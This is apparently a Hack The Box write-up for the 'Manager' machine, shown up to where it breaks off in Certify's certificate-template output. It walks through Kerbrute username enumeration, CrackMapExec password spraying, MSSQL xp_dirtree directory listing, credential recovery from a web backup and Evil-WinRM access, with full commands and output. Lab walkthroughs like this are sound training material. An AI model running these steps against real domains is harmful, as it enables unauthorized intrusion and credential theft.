Manager-HTB writeup

H1u2d3a4
20 min readNov 3

Let’s start by adding provided IP to our hosts

echo “10.10.11.236 manager.htb” | tee -a /etc/hosts

Enumeration

nmap -sC -sV -A 10.10.11.236

Rustscan -a 10.10.11.236

rustscan -a 10.10.11.236  
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan'
s speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.236:53
Open 10.10.11.236:80
Open 10.10.11.236:88
Open 10.10.11.236:135
Open 10.10.11.236:139
Open 10.10.11.236:389
Open 10.10.11.236:445
Open 10.10.11.236:464
Open 10.10.11.236:593
Open 10.10.11.236:636
Open 10.10.11.236:1433
Open 10.10.11.236:3268
Open 10.10.11.236:3269
Open 10.10.11.236:5985
Open 10.10.11.236:9389
Open 10.10.11.236:49667
Open 10.10.11.236:49687
Open 10.10.11.236:49688
Open 10.10.11.236:49689
Open 10.10.11.236:49726
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-03 02:39 EDT
Initiating Ping Scan at 02:39
Scanning 10.10.11.236 [4 ports]
Completed Ping Scan at 02:39, 2.65s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 02:39
Scanning manager.htb (10.10.11.236) [20 ports]
Discovered open port 445/tcp on 10.10.11.236
Discovered open port 53/tcp on 10.10.11.236
Discovered open port 80/tcp on 10.10.11.236
Discovered open port 135/tcp on 10.10.11.236
Discovered open port 3269/tcp on 10.10.11.236
Discovered open port 88/tcp on 10.10.11.236
Discovered open port 139/tcp on 10.10.11.236
Discovered open port 49687/tcp on 10.10.11.236
Discovered open port 389/tcp on 10.10.11.236
Discovered open port 9389/tcp on 10.10.11.236
Discovered open port 636/tcp on 10.10.11.236
Discovered open port 49689/tcp on 10.10.11.236
Discovered open port 49726/tcp on 10.10.11.236
Discovered open port 49688/tcp on 10.10.11.236
Discovered open port 49667/tcp on 10.10.11.236
Discovered open port 3268/tcp on 10.10.11.236
Discovered open port 1433/tcp on 10.10.11.236
Discovered open port 464/tcp on 10.10.11.236
Discovered open port 5985/tcp on 10.10.11.236
Discovered open port 593/tcp on 10.10.11.236
Completed SYN Stealth Scan at 02:40, 3.47s elapsed (20 total ports)
Nmap scan report for manager.htb (10.10.11.236)
Host is up, received echo-reply ttl 127 (0.50s latency).
Scanned at 2023-11-03 02:39:58 EDT for 3s

PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49687/tcp open unknown syn-ack ttl 127
49688/tcp open unknown syn-ack ttl 127
49689/tcp open unknown syn-ack ttl 127
49726/tcp open unknown syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.23 seconds
Raw packets sent: 30 (1.272KB) | Rcvd: 23 (980B)

We’ve observed that there are multiple open ports on the target system, with services such as SMB, LDAP, web, and MSSQL catching our attention. To start our investigation, we’ll initiate an enumeration process to gather user information.

Before we dive into the enumeration process, it’s essential to have the necessary tools and environment set up. Make sure you have Kerbrute installed on your machine and access to the ‘Usernames’ list, which can be obtained from the Seclists repository.

use the command below to obtain usernames;

kerbrute userenum -d manager.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.11.236

it will take quite time to get all the users.


ryan
cheng
raven
guest
administrator
operator
jinwoo
zhong
chinhaw

With our list of usernames in hand, it’s time to perform password spraying. We can use CrackMapExec for this task and execute the following command.

crackmapexec smb manager.htb -u users  -p passwords 
crackmapexec smb manager.htb -u users  -p passwords
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator

Through this we discovered that the user ‘operator’ have access to SMB.Or we can just guess the password.. it’s pretty easy.

To connect to the MSSQL server using the ‘operator’ credentials through Impacket’s mssqlclient, you can use the following command:

/opt/impacket/examples/mssqlclient.py -port 1433 manager.htb/operator:operator@10.10.11.236 -windows-auth



Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> SELECT CURRENT_USER;

--------------------------------------------------------------------------------------------------------------------------------

guest

SQL> SELECT SUSER_SNAME();

--------------------------------------------------------------------------------------------------------------------------------

MANAGER\Operator

SQL>

After successfully gaining access, we began to investigate the contents of the database tables. However, we didn’t discover any valuable information After some research , I came across an interesting article about MSSQL. Following the guidance from the article, I executed a special SQL command that allowed me to inspect the contents of a specific directory on the system. The directory I chose, ‘C:\inetpub\wwwroot,’ is a common location where web content is stored on Windows servers.

/opt/impacket/examples/mssqlclient.py -port 1433 manager.htb/operator:operator@10.10.11.236 -windows-auth

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> EXEc xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
subdirectory depth file

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------- -----------

about.html 1 1

contact.html 1 1

css 1 0

images 1 0

index.html 1 1

js 1 0

service.html 1 1

web.config 1 1

website-backup-27-07-23-old.zip 1 1

SQL>

From that location, you can download a zip file called ‘website-backup-27–07–23-old.zip’ directly through your system.

wget 10.10.11.236/website-backup-27-07-23-old.zip
--2023-11-03 04:28:30-- http://10.10.11.236/website-backup-27-07-23-old.zip
Connecting to 10.10.11.236:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’

website-backup-27-07-23-old.zip 100%[========================================================================================================================================>] 1021K 168KB/s in 9.3s

2023-11-03 04:28:40 (109 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]

After extracting the contents from the zip file, you should be able to access the ‘old-conf.xml’ file. Inside this file, you will discover the credentials for ‘raven’.

Gaining User Access:

We proceeded by connecting through Evil-winrm with a simple command, and in no time, we effortlessly obtained the user flag.

evil-winrm -i 10.10.11.236 -u raven -p '******************'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ../
*Evil-WinRM* PS C:\Users\Raven> cd Desktop
*Evil-WinRM* PS C:\Users\Raven\Desktop> ls


Directory: C:\Users\Raven\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/3/2023 5:51 AM 174080 certify.exe
-ar--- 11/3/2023 5:32 AM 34 user.txt


*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
7f5959afdb.......11235559612c09a
*Evil-WinRM* PS C:\Users\Raven\Desktop

I noticed the presence of a file called ‘certify.exe’ and decided to use it to perform various certificate-related operations.Well, ‘certify.exe’ raised a red flag for me because it’s not something you typically find on a system. This piqued my curiosity, and I suspected it might have something to do with certificates or privileged operations.

I started by checking if there were any vulnerable certificate templates.

*Evil-WinRM* PS C:\Users\Raven\Desktop> ./Certify.exe find /vulnarable

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate templates
[*] Using the search base '
CN=Configuration,DC=manager,DC=htb'

[*] Listing info about the Enterprise CA 'manager-DC01-CA'

Enterprise CA Name : manager-DC01-CA
DNS Hostname : dc01.manager.htb
FullName : dc01.manager.htb\manager-DC01-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=manager-DC01-CA, DC=manager, DC=htb
Cert Thumbprint : ACE850A2892B1614526F7F2151EE76E752415023
Cert Serial : 5150CE6EC048749448C7390A52F264BB
Cert Start Date : 7/27/2023 3:21:05 AM
Cert End Date : 7/27/2122 3:31:04 AM
Cert Chain : CN=manager-DC01-CA,DC=manager,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Deny ManageCA, Read MANAGER\Operator S-1-5-21-4078382237-1492182817-2568127209-1119
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Allow ManageCA, Enroll MANAGER\Raven S-1-5-21-4078382237-1492182817-2568127209-1116
Allow Enroll MANAGER\Operator S-1-5-21-4078382237-1492182817-2568127209-1119
Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : File Recovery
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Computers S-1-5-21-4078382237-1492182817-2568127209-515
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : DomainController
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Directory Service Email Replication
mspki-certificate-application-policy : Directory Service Email Replication
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
